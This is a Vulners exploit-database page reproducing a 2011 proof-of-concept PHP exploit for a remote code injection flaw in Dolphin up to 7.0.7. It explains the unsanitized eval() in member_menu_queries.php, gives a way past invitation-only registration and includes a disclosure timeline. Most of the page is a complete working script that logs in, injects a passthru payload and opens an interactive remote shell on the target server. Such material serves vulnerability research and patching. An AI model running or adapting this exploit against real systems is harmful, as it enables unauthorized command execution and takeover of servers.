Vulners
Lucene search
Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection
<?php
/*
----------------------------------------------------------------------------
Dolphin <= 7.0.7 (member_menu_queries.php) Remote PHP Code Injection Exploit
----------------------------------------------------------------------------
author...............: EgiX
mail.................: n0b0d13s[at]gmail[dot]com
software link........: http://www.boonex.com/dolphin
affected versions....: from 7.0.0 to 7.0.7
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] vulnerable code in /member_menu_queries.php
61. case 'get_bubbles_values' :
62. $sBubbles = ( isset($_GET['bubbles']) ) ? $_GET['bubbles'] : null;
63. if ( $sBubbles && $iMemberId ) {
64.
65. $aMemberInfo = getProfileInfo($iMemberId);
66. if($aMemberInfo['UserStatus'] != 'offline') {
67. // update the date of last navigate;
68. update_date_lastnav($iMemberId);
69. }
70.
71. $aBubbles = array();
72. $aBubblesItems = explode(',', $sBubbles);
73.
74. if ( $aBubblesItems && is_array($aBubblesItems) ) {
75. $bClearCache = false;
76. foreach( $aBubblesItems as $sValue)
77. {
78. $aItem = explode(':', $sValue);
79.
80. $sBubbleCode = null;
81. foreach($aMenuStructure as $sKey => $aItems)
82. {
83. foreach($aItems as $iKey => $aSubItems)
84. {
85. if( $aSubItems['Name'] == $aItem[0]) {
86. $sBubbleCode = $aSubItems['Bubble'];
87. break;
88. }
89. }
90.
91. if ($sBubbleCode) {
92. break;
93. }
94. }
95.
96. if ($sBubbleCode) {
97. $sCode = str_replace('{iOldCount}', $aItem[1], $sBubbleCode);
98. $sCode = str_replace('{ID}', $iMemberId, $sCode);
99.
100. eval($sCode);
When handling 'get_bubbles_values' action, input passed through $_GET['bubbles'] isn't properly sanitized
before being used in a call to eval() at line 100, this can be exploited to inject arbitrary PHP code.
Successful exploitation of this vulnerability requires authentication, but is always possible to create a
new account also if 'REGISTRATION BY INVITATION ONLY' is enabled, in this case an attacker could bypass
the restriction visiting first /index.php?idFriend=1 and after point to /join.php for a new registration.
[-] Disclosure timeline:
[25/09/2011] - Vulnerability discovered
[26/09/2011] - Issue reported to http://www.boonex.com/forums/topic/PHP-Code-Injection.htm
[26/09/2011] - A moderator hide the topic
[29/09/2011] - Vendor contacted again through http://www.boonex.com/help/contact
[04/10/2011] - Vendor replied that there is a designated place for this kind of report: "Dolphin Bug Reports" forum
[04/10/2011] - I replied that I've already posted in this forum, but the topic has been hidden
[05/10/2011] - Vendor reply: "It may has been hidden because it WASN'T posted in the proper place"
[05/10/2011] - My reply: "It has been hidden for security reason, the moderator told me to report the issue through http://www.boonex.com/help/contact"
[08/10/2011] - Vendor replied that a patch will be released as soon as possible
[13/10/2011] - Vendor update released: http://www.boonex.com/n/dolphin-7-0-8-beta-1
[18/10/2011] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die( "\n[-] No response from {$host}:80\n");
fwrite($sock, $packet);
return stream_get_contents($sock);
}
print "\n+------------------------------------------------------------+";
print "\n| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 5)
{
print "\nUsage......: php $argv[0] <host> <path> <username> <password>\n";
print "\nExample....: php $argv[0] localhost / user pass";
print "\nExample....: php $argv[0] localhost /dolphin/ user pass\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "ID={$argv[3]}&Password={$argv[4]}";
$packet = "POST {$path}member.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/memberID=([0-9]+).*memberPassword=([0-9a-f]+)/is", http_send($host, $packet), $m)) die("\n[-] Login failed!\n");
$phpcode = "1);error_reporting(0);passthru(base64_decode(\$_SERVER[HTTP_CMD])";
$packet = "GET {$path}member_menu_queries.php?action=get_bubbles_values&bubbles=Friends:{$phpcode} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: memberID={$m[1]}; memberPassword={$m[2]}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\ndolphin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
preg_match("/\r\n\r\n(.*)\{\"Friends/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
print $m[1] : die("\n[-] Exploit failed!\n");
}
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1